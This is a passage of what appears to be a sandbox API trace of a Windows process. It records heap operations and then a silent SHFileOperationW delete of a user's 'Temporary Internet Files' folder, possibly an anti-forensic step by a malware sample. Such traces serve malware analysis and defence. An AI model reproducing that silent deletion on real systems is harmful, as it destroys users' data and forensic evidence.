[0251.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0251.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0251.351] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0251.351] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0251.351] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0251.351] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0251.351] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0251.351] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0251.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0251.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0251.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0251.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0251.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0251.352] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8a) returned 0x24208b8 [0251.352] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Local/Temporary Internet Files", nBufferLength=0x104, lpBuffer=0x8bf664, lpFilePart=0x8bf658 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files", lpFilePart=0x8bf658*="Temporary Internet Files") returned 0x44 [0251.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24208b8 | out: hHeap=0x25c0000) returned 1 [0251.352] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temporary internet files")) returned 0x2416 [0251.352] SHFileOperationW (in: lpFileOp=0x8bf870*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files", pTo=0x0, fFlags=0x614, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle="\x7df2\x3dce\xc953\x484b\xd76e\xe3ef\x12ec\xf625\xe82c\x52a5\x67f1\x1d01\xa1c1\x7217\x3768\xe797\xfa35\xb619\x4322\xe113\x621c\xe57c\x2e40\xac0e\x4cf3\x12c9\x9f9c\xf6cf\xea42\xc4dc\x2580\x29fc\xddc6\xa843\xa662\xda1d\xf9cb\xc236\xf1eb\x9835\xee68\xf283\xbc77\xe588\x25bf\x1080\x27fe\xbf0f\x17b6\x29ad\x69f\x9aec\x5ba7\xa4df\x4fd1\xf3b1\xd9c0\xc1be\x5667\xe6ac\x8b48\xcfc2\xb600\xdf1d\xb1cf\x76d\xd83c\x33b0\x11c\x14bf\x4751\x2a30\xa209\xfbd6\xc340\xc455\xd518\xf8c3\x3042\x4970\x3d83\x8579\x1a18\x7801\x1d\xdd2a\x52c5\x9b4f\x3c26\xb4cd\xbdac\x3088\x4530\x84c5\xce6b\xf6c6\xce3c\xefbb\x6f50\xf3e7\xc885\xb7bb\x4ee3\x3f28\x4742\xe8c0\x850f\xc415\x4dba\x8e6e\x17df\x7be0\x9653\x8860\x639f\x6801\xb053\x624f\x7b42\x7d9b\xf696\x9b36\x953d\xd5cc\x81a9\x413c\x55da\x7bb3\x53a9\xd665\x5b38\x74c3\x1961\x336c\xc94e\x9581\xe56c\x9cb5\x1310\x6bb3\xae3a\x4643\x34d6\x8456\x559\xc200\xec1d\x81c1\x9ac8\xdbaf\x97c3\x9ca9\x8017\x3702\xc0de\xefdf\xe5b\x8bef\xee78\x1287\x7f59\xdd4c\xcccc\xc5c\x1b2f\xfece\x8e39\xcbf\x4584\x1f67\xa8c\x9894\xda6c\x86af\x1d2c\x713b\x8ac4\x5d20\x4778\xdee5\x34c0\x1f6a\xb10a\x3d80\x3d8f\xfc0c\x6cdd\xda0c\x2193\x9b9c\xec76\xdc61\x62f0\x216b\xeb33\xa77\x6e6\x2a4\xcb27\x7c84\x4fec\x44d0\xdff6\xb8b1\x43e2\x6ae4\xbc63\x97f3\x80\x12fa\x8216\xf0b8\xc603\x4b29\x4ee0\xfa9a\xbdfd\xbed0\x8349\x8f9\x6e06\xbcdb\x560c\x10d5\xd991\x7d87\x7ba3\x4a8f\x8385\x59af\x34ad\x15b5\x5ed3\x9837\x3dd3\xf78c\xecc0\xecbd\x6c87\xf7ec\x5aaf\x925\x6a96\x9603\xf0ea\x5640\x1fde\x6b28\xcc1f\x719a\xaca\xd623\xbec4\x231d\x6249\xce0e\x5196\xb6a2\x6478\xc70f\xa471\x6ced\x38df\x4a94\x281a\xf0a0\xb3ee\xea2d\x20e8\x6b84\xdd1a\x824e\x5db3\x305a\x3d2f\x858\x867c\x2238\xa0d6\x3f42\xab52\x8f46\x95f3\x583c\xd58\x571d\x8772\x3fb5\x7b84\x30c1\x7b75\xb251\x37ca\x6e8d\x2979\xb8a0\xfabd\x8133\x4938\x9f74\x4ad9\x115b\x2a07\xeaf7\x3483\x4f5a\xa1f7\xf2a0\x702d\x48db\x98b4\x27fa\xa2b8\x811c\xfe6e\xa018\x8dd\x4e35\x81cb\x206b\x9009\x7d4f\x5ef6\xfd84\x601e\xc0b1\xc8eb\xa9b4\x727d\xb6b4\xc028\x56c\x67de\x4e37\x35b\xc5d7\x2d0a\xb487\xac20\x8d34\xa16c\x8327\x9880\x85fa\xd390\xc919\x8ce9\x8326\xf2d6\x698a\x8803\xc042\x9f06\x5777\xd189\x442d\x515b\x79dd\x1ed\x96b4\x389c\xfe44\xee8c\xa029\xaf84\xe75f\x6624\xc54d\xfd5e\x57ae\x313\xf8df\xcdab\xfc33\x956f\x8b7f\xf324\x72bf\x9d42\xb9b8\xd461\x3438\xeeb\x6272\x3faf\x8f7b\xe47f\x1d3e\xb474\x6ec2\x37c8\xa2b5\x9f4b\x6a44\x70bf\x7bc2\xbc2e\x155f\xbf79\xde18\x8907\xa4d7\xae8a\x26c0\xf212\x66ca\x7e1d\xe19f\x3fdf\xeff0\xf9ef\x69f7\x7dfe\x7f8a\xe49f\xdddf\xbf9c\xd10b\xba35\xaf3d\xd864\xff87\x417\x8cec\x8cd4\x62ff\x703f\x5125\xfb46\x206a\x52fe\x1f8c\xd05d\xb00a\xf9cb\xfab\xba74\x4e82\xd3dc\xd819\x7165\xfdea\xef70\x2b86\xa030\xcedb\x32ce\xf30b\x6848\x13a6\x9acd\x95c1\x48c\xe8ef\xd334\xd83e\xb625\x8390\x273e\xf2ee\x72e3\xb434\xeacb\x24d8\xfde5\xd646\xc1ed\xf682\xa70\xb5f5\x8943\xb78a\xe836\xf76b\x5f52\x9d1b\x9db9\xd416\xa168\x7682\xed33\x908f\xb5d\xeedd\xeb9e\x73a7\xfdd2\x3974\xf320\x77a7\xed44\x4e4e\x75c\x67d3\xd2dd\x8423\x74ab\xa59\xe208\xd07e\xe81f\x2f1\x61be\x46c9\xa214\x6399\x5b80\xe0b\xca4\x8337\x45fc\x9d13\x1db8\x603f\x82b\xebc7\xd6fd\x1cbb\x459e\x55b6\xf5ff\x722c\x6eac\x53f7\x1b85\x8087\x235\xc4ff\x8bca\x9df2\x3a5e\x4525\x7ab3\x85dd\xea5e\x6ecc\xc1f2\x381a\x1fc8\x4c2a\x4521\xbf16\x9b67\x6c9e\x12d6\xdb63\xd500\x54d3\xc72\x4abe\xf79f\x9b53\x849b\x8252\x22fe\xaad\x2306\x2645\xbec1\x6948\xcf7c\x2e6d\xf5a1\x423d\x40b4\x4126\x406f\xbb1\x47a1\xe9c5\xb824\xd5cc\x25d3\x70fa\xdf0a\xe4f8\xd313\xe84c\x1f01\x38fd\x8bbb\x3769\x8ac3\x3b48\x4d2b\xe920\x2ed7\xb242\x8199\x5206\x7baf\x3d2e\x1aa8\xa649\x386a\xe84c\x65ec\xbd1a\xa1c3\x2d15\x7a77\x9343\x29cd\xa8d8\x8d90\xf44e\x39e8\x55b6\xf889\xac70\xa872\xf74\x2974\x11f0\xea4c\xa105\xb009\xcfa\x2328\x69d0\xba12\x3d66\x6b1\xd91c\x717b\xdacb\xdd97\x8a44\x38a6\xd6fd\x6226\x702d\xbda0\xa155\x6d13\xf2b9\x11aa\xa274\x5723\xadb5\xe21e\x5cf5\x22bc\xebcd\xdbb9\x5ab6\x8d51\x331c\x5560\xce83\x5a10\x2c2b\x36e6\x51bf\xc03b\xb073\x6de4\x4a95\xb746\xd209\x2867\x5225\xad87\x588a\x8e7d\x9270\xb86a\xd524\x8118\x9402\x3850\x43ee\x4385\x7b17\xb341\xb4e3\x1e8e\x27f9\x93c2\x1a5c\x302c\x7c85\xf1bf\xf60b\x6719\x705\xa640\xc505\x658b\x4dc\xe112\x295d\x33b4\xa97c\xccd9\xae92\xbbe4\xcf1f\x5a11\xc196\x1e77\xd652\xa293\x4e49\x6d62\x3cf4\x5b68\xf765\xe83c\x9558\xfc00\xec\x14f4\x2386\x3541\xcc9a\xcdb0\xfd4b\xbe36\x77d5\xb900\x74c7\x7312\xc19a\x61f6\x90ab\x9c1f\x2647\x3cb\xe3fc\x5ae\x28dc\xabfa\x702b\x7aad\x8736\xc90b\x59c3\x619\xf4e9\xd41c\x963b\xf069\xdc55\x3200\x5881\xd744\xc967\xb35c\x6943\x4b81\xc80e\x40a5\xe10c\xa05b\xd807\x3f7c\x3a2c\x3c79\xa3ff\x32ee\x77ce\xd5b8\xf71f\x4571\xa105\x197c\x589b\x20d8\x5647\xbc84\x22bb\xa638\x905\xe9e7\xc224\xa7d4\xe773\x7a1c\x98c8\x6db\x9315\x8076\xf631\xcb9f\x9711\xdaca\xb125\x83c2\xa7cc\xad9a\x3cd0\x27ee\x961a\xc100\x5050\xdb9c\xe6db\x824c\xd8fd\x2f5f\x4547\x59f5\xd417\xda5a\xfd97\x430e\xab4\xc043\x9b42\x7048\x838a\x2f05\xa3e7\x92e0\x1de3\xe2c8\xa7f5\x6c93\x2f01\x1aa4\xe893\xb676\xa41f\x3647\x979d\x73c4\xfb85\xeea0\x9832\x39d0\x5c0e\xbf72\xff66\x2a1a\x6bc5\xec11\x9e52\xa76\x85cc\xf9a8\x88d3\xaa8e\x78f0\xed31\x9d42\xf114\x3227\x7c79\x5c56\x8f7c\xfd1d\xe7d\x1f5c\x38a9\x877\x2da0\x69d\xef15\x7c0d\x780d\x9a2d\x5d9f\xee13\xcf8a\xa7f3\xde4c\x48c5\xd845\x1ebf\x3ad8\xcb01\x838a\x24cd\xd7a1\x85dc\x5b20\xf290\x1ba3\x36f8\xfd9a\xd9f6\x8f11\xcaa8\x6d17\x1338\x754f\xb8db\xf544\x11d6\x436e\x6946\x4b2a\x4a71\x938a\x9538\xb27e\xcce2\x2973\xfcfd\x84e\x2966\x54fd\x8417\x20f3\x290c\x2148\xf384\x3c20\xc217\x8a85\x8ab3\x671b\xa9fa\x2173\x780a\xd949\x117a\x562c\x5fa\x1a39\xcb05\x73d7\x43f3\xd432\x2035\x623f\x278c\xb2b4\xab1d\xce0f\xf32c\xfed3\x3518\x1497\x3255\x9b\x42f\x2770\x1236\x8bde\x6231\xf299\xa566\xc764\xd08\x3270\xabe8\xd3f2\x7909\x74a8\x967\x8f6f\xaf90\xf915\xae08\xa4ac\xb7c1\x65de\xf5ff\xd060\x1ba3\xdfb0\xec21\xc92d\xc9de\x615e\x1a38\x71db\xe234\x7cf9\x590f\xe21d\x7ea4\xb71c\xaaa\xb5d9\x7197\x824a\x5f09\x638f\x2ece\xe1e1\x3959\x3a11\x362\x3c05\x4bc7\x9c2d\x6bad\x59b4\x72b3\x403c\xb346\x8b9b\xa8e2\x6037\x34f3\x22a1\x3034\xa279\xaac0\x5908\xa09\xc98a\x2146\xeffb\x7266\xfce1\xc993\x5c\xee7d\x9436\xed71\xb319\x9430\x795a\xd71b\x1f9c\x9113\x4473\xb3e4\xb222\x445c\xe6ee\xf691\x22e5\x2354\x594a\x4229\xcc5f\xa1e4\x22a5\x4e34\x1e84\xa114\x2281\xa2df\xb8db\x6057\xef54\xdbbd\xb081\x1f89\x5249\xeabd\xadc4\x21d\x513\xf6d8\xa91f\x9bb7\x2426\xf8ba\x4923\xb024\xa488\xac2a\xb5db\x3871\x291f\xd4eb\x5287\xe1c4\x9313\xa1b1\xbbd\x482\x3e87\x7b14\x1f48\x514a\x347d\xbf42\x6d11\xbf51\x6d98\x7743\xd5ea\x494e\x8587\x16ef\x2a07\x3311\x7d90\xdbc0\xc724\xceb9\xbd82\x3b6c\x3fcb\xb38c\x3ced\xc52c\x76d9\x1cf6\x8f3b\x76d\x9165\x6719\xbc09\x1e88\x774\x2c7a\xe82e\x2cc2\x4dd\x6e45\x1b8b\x3d9b\x41d1\x5eb8\xba13\xe645\x909e\x6c8d\x8c1a\xfd72\xa744\xb67c\x47a7\x5c74\x1eca\x3742\x438b\x1f7a\xfd42\x660e\x2ee3\x4512\xa90e\xdf3e\x9319\x8db7\xf887\xb5c8\x207e\xdba1\xeaa5\x8ba8\x9e3\xda66\xedc9\xa1a0\x8171\x3ed9\x751\xdf09\x5337\xf668\x9076\x8de3\x63f1\x4a20\x240a\x4f1\x32ec\x6d00\x63ea\x8493\xa119\x2ea3\x6fb2\x3b85\xb8b2\xbb19\x1069\xfa26\xeffc\x375c\xdc4b\x4e84\xbb7d\x346\xe2a\x7f\xbd8a\x536\xe58b\x6d18\x284f\x9446\x2ae1\xd6e\x8c0c\xe9fd\xd007\x62dc\xeaff\x8e01\x7388\xf1b9\x3905\xd079\xf3e\x1aa2\xd7ec\xc43\xdb56\xbf60\xb166\x2950\xec1b\x4437\xaade\xb951\x8b24\x106a\xafe7\x9cc5\x360d\xd2d9\x9e2b\xfea6\x3a69\xac16\x5cd9\x48d1\xcd18\xdfd4\x2344\xe321\xc3ae\x70d0\xca86\xb1ad\xa73d\xfcee\x78fe\x5b20\x4281\x2a6a\x832f\xfce\x2d59\x15bc\xa7b3\xb447\x7a7f\x1e98\xd2f2\xe56d\x2cdf\xe7d6\xe7df\x3ba5\xba54\x2d4f\xbcef\xf177\x7f7c\xd7f9\xe693\xe2f\xe650\xae4d\x4d0b\xbd92\xdbc9\xe554\x6dc9\xf96a\x6a37\x5f40\x96a8\x9f1f\x58bf\xd7bf\x7c97\xfca8\x9178\xe05a\x26f5\xca1f\x9e53\xcfac\x526e\xf65e\x7962\xd08d\x1b0c\x92b0\x1f14\xd408\xd337\xf2d6\x3a4f\x346f\xf295\x3553\xb209\x67a4\x9f96\x9b9a\x9160\x91f4\xa7e5\xf18a\xb439\xdb7c\x9386\x83df\xe5da\xea5a\x9b26\x5db0\x897c\xfe55\xa7b0\x8074\xda97\x2fef\x4191\x6986\xbd94\xfb41\xf03d\x4e1a\xb884\xe15b\xf25\xf644\x6aa1\xc7f9\xd292\xa8a9\x27e5\x6525\xb4ae\x1922\xda12\x6120\xc02e\x51ab\xf067\x15b0\xb023\xf455\xd074\xc6e6\xc6f9\x2946\x3f9b\x53ed\x498a\x902d\x2fb4\xf16\x331\xb4a\xec1b\xb4ea\xe8\xe079\xf0d\x2029\x6868\x58e9\x5c7c\x7a58\x8365\x387d\x5bc4\x8a79\xf0c1\xde86\x79f7\xd5d\x7d2e\x8340\xedd\x3b61\x9887\x6553\x4ae9\x7049\x173b\x124a\x8819\x59ff\x8adc\x4e5\x44ba\x2c9b\x42c8\xd983\x406e\x6d5\x2069\x1f62\x1f45\x7437\xc1be\x5305\xf743\xd4a3\x87b2\x1bb9\x4424\x7310\xd0d4\x716d\x643a\x996f\x8b96\x206b\xa0db\x5013\x6a87\x36ec\xc87d\xdf85\x6823\x98b3\xcc2e\xa034\x5de5\x6b92\xf4bf\x5941\x725a\x9011\x66c8\x7768\x3288\x87e8\xb527\x443f\x43d2\x32aa\x23e9\xf3d5\x6051\xd9fb\x2bd6\xc64\xa22b\x5942\x8fdd\x4fd7\x36c7\x7101\x2b60\x1378\x72b0\x3c36\xb956\x241b\x175b\xac54\xc542\xec74\x900b\x5232\xeefd\xaa9e\xfe77\xd54c\x5bff\x23df\xcf1d\x1a9b\x3bab\xc513\xe86a\xe8fd\x48e2\xdfef\xed4a\xfde9\xe280\xdef8\xfb6f\x26b9\xdd9c\x5e86\xb736\x7a02\xa3b7\xe680\xe9fa\x39ad\x9905\x77df\xb6a9\x505\xb8f4\xbf46\x9680\x9529\x211f\xd12e\x907\x8448\x208d\xb611\xb27a\xe315\xc07e\x7a73\x5886\xea4d\x6d3d\xd0d3\xf651\x682f\xf56c\x769e\xc060\x1df8\x8c04\xa715\x2a41\x78a9\xbc42\xc8a6\x20fa\xa700\x7170\xfc5\xb3c2\x3b75\xe368\xcb35\xae56\xcbd2\x4a57\xa545\xb7f7\x3207\x3188\xe9fe\x51cf\xbe5b\xf808\x843\x58de\x3f46\xd8ce\x72fa\x2eb\xb41\x12d6\xa688\x69da\x30a7\xf131\x7682\xdab2\xf8a9\x313a\xce8f\xd38\x59aa\x9701\x3245\x2220\x6fc3\xcfdd\x1fbd\x7177\xc311\x5b4c\x15b6\xad0a\xd483\x7d66\x58c7\x34d3\x6bb3\x5e3a\xc5e5\x83c\xe28a\xc443\xf99f\x476d\xfb10\x42d1\x4dac\xdbd4\x3d8c\x792b\x5e08\x57b0\xc5a5\x3e5d\x4b9b\x82f7\x2c0\x4c2b\x8f8e\x16d6\x6b58\x5026\x9d6f\x5d0d\x5d17\xe6f8\xb780\x81d2\xde90\x2139\x5bd7\xce7\xc324\xa6b\xa6be\xee8\xacd5\x7af5\x9476\xc234\x6057\x260c\x8641\xe90d\x51f5\x41e1\xa4c0\x27a0\x706a\xf122\x8e62\xc87f\xd605\x20ed\x9b64\xf40d\xf402\xbbf9\x5a1f\xbbca\x7a8b\x82f\x733c\x60\xe517\x69f8\xbc29\xda7f\x7ecb\xed47\x6f13\x8192\x6e33\xb91b\x3d43\xead1\x591d\x4de3\x5ae\x7146\x4435\xda72\x5765\x8bf5\x4498\x7136\x2dd2\x6084\xbd97\x801f\xfa2d\xb168\x3c96\xe7f7\x5ac8\xc892\x12d7\xce31\xd39b\x5980\x21a8\x6162\x43d7\x1370\x1172\x7976\x5a07\x9109\xa76f\x7e3e\x963f\x5a0f\x75f0\xc5d3\x17c6\x80f2\x4b15\x790\x6998\x77ee\xe1b8\x106e\x4e7b\xb858\xb4cc\xdf97\x2186\x646e\xed7f\x6c2b\xbd58\xb37c\xece3\x9927\x707b\x755f\xf280\x7ca6\xadbd\xe05f\x6266\x56d6\xe8d4\x883e\x1c0b\x6ff5\x8b29\xf9fc\x4737\x290c\x7e67\xb211\x1bf5\x2a65\x3492\x1bbe\x96be\xa236\xc209\x1903\x16b7\x5284\xe42c\x2b44\x6477\x5918\xafeb\xd3ac\xa3f7\xce3f\xe050\x8d69\x5d72\x5cec\xa1ca\xc84d\x5912\xc2d0\xec77\xb9f2\x7054\xf423\xfb63\xb87d\xa672\xfbfd\xbe3e\x176\xe457\x4a2e\x72b9\x2140\x414\xe0a6\x704\x6193\xc282\x4276\x84f7\x443f\x8365\xe71d\x1acb\x488\xc8a2\x6c4b\xc05c\x9acf\x2753\x3068\x3c6\xda40\x957f\x12f4\x1ff6\xe2d0\x7d85\x7695\xafd3\x1d41\x693b\xee82\x2ae3\x4200\xe79a\xe2ce\xd3f6\xb26b\xaaf7\x4fd5\xe162\xc869\xb82e\x1d44\x682a\x9215\x4834\x9cd5\xd802\xdcbb\xacc3\x9ab2\xe78b\x8d95\x835c\x21e3\x6058\x50b3\x810\x70ae\x35f\xf962\x58c2\x1022\xcc01\xdbb4\x92de\x9184\x7696\x92b3\x7c3e\x9cf6\x6695\xc520\x6d38\x89ea\x85c0\xd69e\x97a\xd6e8\x4d0f\xb53\xef3d\x2ec6\xa308\xa94c\x4fcb\x6797\xc44\x8033\xc11f\x8845\xe71f\xefae\xea30\x301d\xbfc2\xb004\x111a\xbfe3\xd336\x6f96\xc5c1\x59bd\xd3f8\xd102\x44e3\x3a0c\x8db\x780\x8854\x9dc9\xe7c7\x5b0a\x5bb2\x9c8a\x425b\x351f\x2818\x497\xca94\xda0d\x4dd9\xb56c\x1319\x9034\x40e\x6faa\x53f8\xd504\xf1ed\x3ea8\xa408\x151e\xc3c5\x619b\x3716\x120d\x57a2\x8746\xd1df\xb65b\xd0d\x7e5b\x220d\x78c6\x1e1d\x9061\xad6a\xdd1\xc895\xc856\x1fb1\x6791\x4d87\xf917\xffb4\xf977\x408a\x1bd3\x6cbf\x6432\x1eb5\xc626\x23b8\xa052\xc31f\xd7d\x1c98\x6e07\xee8f\xffa\xb60a\x4729\x727a\xd2c3\x61bb\x4e33\xb9ea\x43fb\xdd5b\x171c\x6586\x7940\x2bf4\xb342\xa171\x6a19\x772c\x7ac8\x681a\x6641\x23da\x9198\x66ee\x7e97\xe38f\x1236\x1af7\xc49d\x15dc\xfd8\x4e99\x51fb\x9c58\xcdd2\x2277\x8f0d\x481c\xd330\xd96e\x452c\xb4d2\x3e04\xef3d\x5236\xbe54\xe15b\x8a76\xfa5\x647b\x9f8c\x8259\xeec2\x7660\xb019\x4d9b\xe117\x3cac\x6f89\xc9b8\x7ec7\x9fb\x6e54\xac3d\xc685\x4196\x7e95\xdc63\x9247\xc89e\x2927\xe77c\x3c26\xc93a\xba32\x3485\xee8f\xcc11\x8493\x922\x2e9e\x2504\xfc7c\x24a6\xb04c\xce5\x8cf7\xe168\x399\x17\x6c3a\x117e\x3b8\xa133\x7f14\xdc70\xe147\xe604\xcd3d\xa493\xe5be\xddc7\x741a\xac5\x173f\xc1e9\x210a\x47f9\xcfd6\x2ade\x7645\xc17\x2305\xe20\x72ac\xc0e3\xdc05\xa8a4\xf81e\x1fc4\xca17\x4db8\x689\x132d\x29c2\x783b\x2485\xcc98\xdca8\x4633\x7abb\xb74\xfe60\xba3d\x514b\x6813\x4f0d\x9c10\x26e5\xcd98\x9846\x6fc3\xc5ab\xba1c\x896e\xc7ec\x6998\x31c7\x6e8a\x8ee9\x6498\xb90a\xd4d4\xa662\x5e3d\xb82d\x18fb\x7fc4\xd374\x388e\xcdb5\xc646\x8595\x736f\xda35\x8188\xec8c\xa426\x2c2f\x4cd6\x4bfb\xcf75\x8b59\xc8bc\xf8fe\x9eac\xcda\xfe0e\xd617\x6d96\x7d62\x7973\x807d\x1725\xea47\xedcb\x6fa9\xd62e\x30b2\x5f56\x7c71\xf57d\xfa91\x87ae\x666c\x6183\x565a\x83fc\x18d7\xb5f1\xf6a4\x2b7b\xfb90\x7fd9\x939\x6d44\x522b\x39b7\xa6ea\xbe6a\x485f\x33ed\xec05\x38a6\xe4d8\x4c28\xb015\x7131\x8bb0\xb0a2\x42b\x606c\x2c1c\x3aa9\x33e2\xc208\x3dad\xc04d\x26bb\x3c02\x4851\xedac\xda66\x8dc6\x1b3d\x1928\x9b51\xb50d\xf8e7\x5051\xacac\xe879\xc82a\x7f9\x89c8\x3946\x5dc8\xb98d\x71fb\x6d9\xbc96\xa356\xe1fb\xbe50\x5bac\x5d68\x6ed0\xf3f7\xa45d\xea17\x1aa2\xf473\x651c\xe1ea\xb8dd\xf393\x46d4\x31be\xe5f6\x1eee\x93d7\xbedf\xa3c9\x3cc2\x19aa\xbf8a\x2275\xd2d7\x1b26\xa188\x42b\xf4\xb342\x37ed\xe44c\xff7b\xbd00\x4386\x14ef\x6d0\x7501\xa0c5\x7117\x9e68\x6e80\x5012\xc4b\xe0ea\x11d0\xba02\x4045\xe3ff\x428b\x5ebf\x5083\x809b\x2ebe\xf5a0\xe831\x1c07\xd9fa\x39bf\xfff4\xf404\x18d5\x9eb4\x1b43\xf405\x125\x175d\x6e83\xd0e0\x8bf\x73e8\x7a02\xc5f\x5bfa\x7d0e\x4054\x129f\x9bd0\xd062\xe0a\x2c5d\xcfa0\x6808\xc56\x98ba\xb43\xf405\x171\x1fed\xce83\xd0e6\x231\x54a\x5bf4\x146f\x813a\x743\x6808\x80a5\x17be\x5e83\xa1ce\x6f5d\xe870\x16a\x8ead\x741\x6872\x1bdb\xfa3c\x2f25\x1d17\x8e1e\x644c\x2ed0\xe871\x9166\x10d7\x5779\xf2c4\x517e\xd08e\xdfe7\xaf88\xcef7\x7418\x873f\x12ae\x47d0\x3404\x62f\x877d\xe743\x680a\x80b9\x888e\x5f41\xd0e5\xbd09\xb5ea\xa0c5\x704f\x5ba8\x5740\xe80a\xf967\x71b1\xd0e6\x104\x407d\x1b40\xd063\x393b\xfd94\x438b\x16ef\xbfd0\xa0c4\x1c85\x43ba\xa740\xe80b\x31a3\xf5e8\xfa1c\x809a\x4fa\x7174\xea0c\xd0e6\x4c7\x9274\x1680\xa0c6\x397d\x58b4\x5540\x1d01\x8313\x9776\x7421\x809a\xb66\x80e8\xf418\xe13\x46bd\xaf40\xd010\x9ae\xe851\xe4e\x281d\xc3a0\xb405\x62d\x937d\xbb43\xc9ff\x6ba3\xf027\x1df9\x9b12\x17df\xf439\x17d\xc3fd\x4e04\x4fb5\x7772\x889c\xccad\x351c\xa1f\xf98e\xb6\x42bd\x7710\x1b5e\x1279\xcf80\x81ec\xf703\x1745\xa183\x12ff\x47c5\xd812\x8830\xc32\xc297\x9a2f\x5202\x3761\x5728\xa822\xe14c\xc112\x6330\x36bc\x964f\xc0e4\x4d80\x63df\xda34\xc5ea\x7a9a\x8c6d\x69a7\xd4a1\x2ee0\xe960\xb7b\xad68\x71ea\xfde8\x5771\xc6a6\x8a49\x11b6\x7ba3\xc950\x9451\xe191\x5add\xa7e3\x5ade\x5d47\xfedc\x2e1a\xae82\xb85b\x58ee\xb47e\x1f90\xb51f\xa9bf\x446\xad7\x1e77\xd0c4\xec93\xd479\xbaaf\x5ba2\xbfda\x8dc1\x9b88\x6cac\x64f1\x5ede\x62a5\x2458\x8ee2\xbcc9\xa9c5\xf8c6\x16df\x1f71\x1b0f\xca00\x6c4d\x52b6\xc451\x65b7\x78ae\x9e1c\xd6ea\x7801\x27a2\xd764\x720f\x5055\x7a5\x2ed9\x6e82\x505b\xe57c\x3c16\x12b2\x8b1a\xa845\x58d5\x82c2\xd8e0\xe6a7\xefa3\x7bda\xda66\x7fe4\xc7a2\xead0\xa1cf\xc19a\xc050\x2822\x1e80\xddc4\x109b\x2ee1\x9565\x65a3\x67e1\x81d7\x39bb\xc826\xdd7b\x96e3\x62e4\x1b44\x67e1\xdf52\x5c82\xb9f3\x5007\xaa8a\x81f2\x6ee6\xf5ae\x4f64\xc937\xc6ec\x9c93\x91cd\xbe92\x5ae5\x3d9a\x20ef\x7816\xd510\x97f9\x926\x3608\xa34a\x9175\x1a58\x3d89\xce24\xbb18\xbd20\xed5a\x2174\xed96\xeb62\x20fc\x2c83\xf4da\xfa2d\xa41d\xfcad\x3087\x8407\x808\x2762\x587f\xdd3a\xeb0b\x2c28\x79c2\x92eb\x92ab\xe416\xeb66\x2a69\xd8b4\x4984\xb3ab\x8bf8\xc86a\x6ff8\xa2a1\x4f92\x2d70\xcbca\x7aab\x9dc3\xb30d\x8ac1\x7771\xc43c\xe4d7\x2819\xb746\xb468\xcf86\x99a2\xea36\x621f\x8eb\xd67\xf9a5\x7bb1\x3484\xf38f\xd20a\x483c\x8bf1\xdd40\xcd2c\xa889\x779a\xf5d5\xd548\x4bc\x1af6\x73b4\xd9e7\xcf91\x2f9c\xcd72\x22f9\x8fef\x148f\xb751\x9461\x8fd8\xfda1\x9f85\x1f44\x8b10\x3ae\xc602\xc3a3\x335\x238\x9dc7\x3833\x8ac9\xd2e2\xb129\xc174\x361c\x3fb9\x7417\x204f\xa22d\x1f0b\xcd09\xa276\x9b7f\x75c4\x78cf\x31c3\x6faf\x5c68\x7539\x2213\x38e5\x6585\x942b\x57e6\x4e65\xdb2f\xa1bc\xec9\x99a4\xccab\x56d\x5ad6\x3241\x9457\xb1c\xc7a9\xee8c\x4b7e\xaa13\xa153\xbaf8\x5af2\x2a2f\xa8ee\x1b68\xfb27\xcaaa\x5ac4\x2824\x7a95\xd9b7\xde50\x8ad1\x71d4\x143e\xf68b\xd66a\x555a\x98d9\xc037\x6ca7\x9d9c\xf500\xfba5\x35ad\xcabe\xfac3\xb445\x4530\xecf3\x492d\xc4a2\xdd61\x79a1\x94f6\x55f4\x6b71\x26b9\xe7c3\x2e69\x24f9\xf7bb\x815\x76f1\xd477\x2e15\x1bfc\xc6ca\xec2d\xae1a\xe824\x4823\x11e6\x183c\x3103\x506b\x4219\x355f\xe79a\x65ae\x4fc3\x1ab4\xb2ed\x6b70\x65e8\xa747\x9bb5\x6e0a\x4a03\x75ca\x56e8\xcce\x38c8\x6d62\xaecc\xcf29\xabc5\x254\x9b29\x2d93\x9d08\xae9a\x593c\xcbd3\x131f\xc4a5\x2161\x864\xd934\x7b4c\x75e5\xf694\xb1d0\xa8b4\x8481\x38e6\xa860\x4a92\x7bfe\x5d56\x3fc2\xcf74\x647c\xcb9f\x8f5f\x5bb8\xad9a\x8961\x10a1\x9eb6\xcdcf\x271c\x41df\xe56c\x1b17\x134\xf78\x2f80\xaf9\x77a4\x3f91\x7a94\x5380\xf64c\x7ceb\x